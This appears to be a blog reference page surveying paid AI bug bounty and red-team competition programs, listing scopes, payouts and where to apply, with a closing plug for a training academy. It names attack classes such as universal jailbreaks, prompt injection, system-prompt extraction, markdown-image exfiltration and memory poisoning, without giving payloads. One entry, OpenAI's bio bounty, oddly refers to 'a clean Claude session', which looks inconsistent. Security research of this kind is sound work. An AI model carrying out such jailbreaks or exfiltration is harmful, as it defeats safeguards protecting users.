Reference

AI Bug Bounty Programs in 2026: Where to Get Paid for AI Security Research

7 min read·By Anthony D'Onofrio·Updated 2026-05-05

AI security is now monetizable. Mozilla, OpenAI, Anthropic, Google, and Microsoft all run dedicated AI bug bounty programs in 2026, with payouts ranging from $200 to $100,000. Here's the active list, with scopes, payout ranges, and where to apply.

The AI security skill stack is now monetizable in ways it wasn't 18 months ago. Multiple major labs and platforms run dedicated AI bug bounty programs in 2026, with payouts ranging from $200 for entry-level findings to $100,000 for exceptional discoveries. The programs collectively paid out tens of millions of dollars in 2025, and 2026 budgets are larger.

This page is a living reference. Each program below is verified active as of the date in the frontmatter. If you spot an outdated entry, email anthony@harbinger.partners and I'll fix it.

How AI bounty programs differ from traditional infosec bounties

Three things are worth understanding before you submit anywhere:

Different vulnerability classes. AI programs reward findings around jailbreaks, prompt injection, agentic-system risks, model-extraction, training-data exfiltration, alignment failures, and content-policy bypasses. Most don't pay for traditional infrastructure bugs (those go through the company's regular VDP or web bounty).
Some programs are open; some are application-only. Mozilla's 0din and OpenAI's Bugcrowd-hosted programs accept open submissions. Anthropic's program requires application + NDA. Read the entry policy before investing time on a finding.
Scope exclusions matter. Several programs explicitly exclude what most people think of as "AI hacking." Google's AI VRP excludes prompt injection and jailbreaks. Reading scope first saves wasted submissions.

Dedicated LLM-specific programs

0din (Mozilla)

Mozilla's 0day Investigative Network is the most explicitly LLM-focused bounty program in operation. Launched in mid-2024, it incentivizes findings across security boundaries that fall outside other bounty programs.

Scope. Prompt injection, guardrail jailbreaks, training data leakage, denial of service, OWASP LLM Top 10 categories.
Payouts. $500 to $15,000, discretionary, evaluated by the 0DIN team based on impact, report quality, and timing.
Process. Submit a high-level abstract first; 0din responds within three business days with a scope decision and likely payout range. Full PoC submission follows.
Where to apply. 0din.ai

If you're new to AI bounty work, this is the lowest-friction starting point. The scope is broad, the process is open, and the LLM-specific framing means your skill stack maps directly to what the program rewards.

OpenAI Safety Bug Bounty

OpenAI launched its dedicated Safety Bug Bounty Program in March 2026 with a $1 million annual pool. Run via Bugcrowd. Distinct from OpenAI's longer-running Security Bug Bounty.

Scope. AI-specific scenarios, agentic risks (including MCP), exposure of OpenAI proprietary information, account and platform integrity. Out of scope: general content-policy bypasses without demonstrable safety or abuse impact ("jailbreaks that result in rude language"), and prompts that surface easily-findable public information.
Payouts. Up to $20,000 standard. Maximum payout raised to $100,000 for exceptional and differentiated critical findings.
Where to apply. bugcrowd.com/openai

OpenAI Security Bug Bounty (separate program)

The traditional infrastructure-style program. Same Bugcrowd page, different scope.

Scope. Traditional vulnerabilities in OpenAI's infrastructure and APIs.
Payouts. $200 to $20,000, with up to $100,000 for exceptional findings.

OpenAI GPT-5.5 Bio Bounty (specialized)

A focused program for one specific objective: a single universal jailbreaking prompt that successfully answers all five bio safety questions from a clean Claude session without prompting moderation. Worth a separate listing because the scope and reward structure is unusual.

Where to apply. openai.smapply.org

Anthropic Model Safety Bug Bounty

Anthropic's program is application-only and runs through HackerOne with NDA. Tightly scoped to one objective category.

Scope. Novel, universal jailbreak attacks against Claude's Constitutional Classifiers, focused on critical high-risk domains (chemical, biological, radiological, nuclear, cybersecurity). A "universal jailbreak" is one that consistently bypasses safety measures across many topics.
Payouts. Up to $15,000 per finding.
Process. Apply via the program page; rolling acceptance. NDA signature required as a condition for joining.
Where to apply. Anthropic Model Safety BB announcement

Anthropic Vulnerability Disclosure Program (VDP)

Separate from the Safety Bug Bounty. Covers traditional infrastructure issues (CSRF, privilege escalation, SQL injection, XSS, directory traversal). Recognition-only, no monetary reward.

Where to submit. hackerone.com/anthropic-vdp

Google AI Vulnerability Reward Program (AI VRP)

Google runs a dedicated AI VRP that reads as a complement to its broader VRP, not a replacement. Important scope caveat below.

Scope. Flagship products: Google Search, Gemini Apps (Web, Android, iOS), Google Workspace core (Gmail, Drive, Meet, Calendar, Docs, Sheets, Slides, Forms). Standard coverage extends to AI Studio, Jules, and non-core Workspace.
Payouts. Up to $20,000 base; bonuses for report quality and novelty raise the cap to $30,000. Sensitive data exfiltration: up to $15,000. Phishing enablement and model theft: up to $5,000.
Out of scope. Prompt injection, jailbreaks, and alignment issues are explicitly excluded. This is the single most important rule to understand: a high-quality jailbreak finding earns nothing here. Reserve those submissions for 0din, OpenAI Safety, or Anthropic.
Where to apply. bughunters.google.com

Microsoft Copilot Bug Bounty

Microsoft's Copilot Bounty covers AI experiences in their consumer Copilot product line. Updated April 2026 to integrate moderate-severity submissions.

Scope. Copilot consumer products: copilot.microsoft.com, copilot.ai, Copilot for Telegram, Copilot for WhatsApp, Microsoft Copilot Application (iOS / Android), Copilot in Microsoft Edge (Windows), Bing generative search in Browser.
Payouts. $250 to $30,000. Critical flaws allowing inference manipulation hit the cap. Moderate-severity findings now qualify for awards up to $5,000.
Out of scope. Training, documentation, samples, community forum sites.
Where to apply. msrc.microsoft.com/bounty-ai

Competition-format programs

These pay differently than bounties: prize pools split among top finishers in time-bound events. Worth knowing because the audience and skill bar are similar.

Gray Swan Arena

Time-bound red-team competitions on (anonymized) frontier models, sponsored by AI labs and governments.

Format. Wave-based seasons. Multiple concurrent challenges across categories: Safeguards, Indirect Prompt Injection, Agent Red-Teaming, Machine-in-the-Middle.
Prize pools. $40,000 to $300,000+ per challenge. Past sponsors include OpenAI, Anthropic, Google DeepMind, UK AISI.
Bonus opportunity. Top 40 overall participants get invited to Gray Swan's private red-teaming network for paid engagement opportunities.
Where to compete. app.grayswan.ai/arena

HackAPrompt

Annual large-scale prompt-injection competition. Prize pools historically $40,000+. Format and exact payouts vary year to year.

Aggregator platforms

Most of the programs above are hosted on one of two platforms. Worth tracking both because new programs land here first.

HackerOne

Hosts Anthropic's bounties, Google's VRP intake for some programs, and a long tail of company-specific AI programs. Search "AI" or "LLM" on the platform's program directory for the current list.

Bugcrowd

Hosts OpenAI's programs. Smaller AI footprint than HackerOne but the OpenAI relationship makes it load-bearing.

How to choose where to start

If you're new to AI bug bounty work, the order of operations that has worked for the people I've seen come up the curve fastest:

Start with 0din. Lowest friction, broadest LLM scope, open submissions. First payout teaches the report format.
Compete in HackAPrompt or Gray Swan Arena. Time-bound events force iteration speed. Top placements become resume material that gets you accepted into the application-only programs.
Apply to Anthropic and the OpenAI Safety BB once you have at least one paid 0din finding or a Gray Swan placement to cite. Both programs filter applications partially on track record.
Microsoft Copilot and Google AI VRP for traditional vulnerability skills applied to AI surfaces. The payouts are higher, the scopes are stricter, and the findings tend to look more like classic web/infrastructure bugs.

The single biggest mistake I see new researchers make: submitting prompt-injection findings to Google's AI VRP, which explicitly excludes them. Read the scope first, every time.

Where Wraith fits in this stack

If you're building the skill from scratch, Wraith Academy is structured around exactly the categories these programs pay for. The audit-framing primitive Mira Ulvov tests is the same primitive Anthropic's Constitutional Classifiers are designed to resist. The markdown-image exfiltration the Cartographer of Hollow Marches teaches is the exact attack class that earns 0din and Microsoft Copilot payouts. The system-prompt extraction Pyromos rewards is the foundational skill behind every chained jailbreak finding.

The WCAP credential is the cert designed for this market: it tests the exact attack categories these bounty programs pay for, in a graded format. Pass WCAP, get listed in the public credentials registry, then go submit.

If you want to start training: Academy is free. If you want to know what to attack first: Mira Ulvov, the Memory Smuggler and the Memory Poisoning pillar cover the highest-value modern category. If you want the full reference for AI security categories these programs reward, the OWASP LLM Top 10 annotated walkthrough maps each category to the relevant bounty scopes.

Last updated

Verified: 2026-05-05. Programs change scope and payout structure regularly. If you spot an outdated entry, email anthony@harbinger.partners and I'll fix it.

Sources:

Want to test this on your own agent?

Paste your chatbot's API endpoint. Get a real security grade in minutes — free during launch week.

Scan your agent →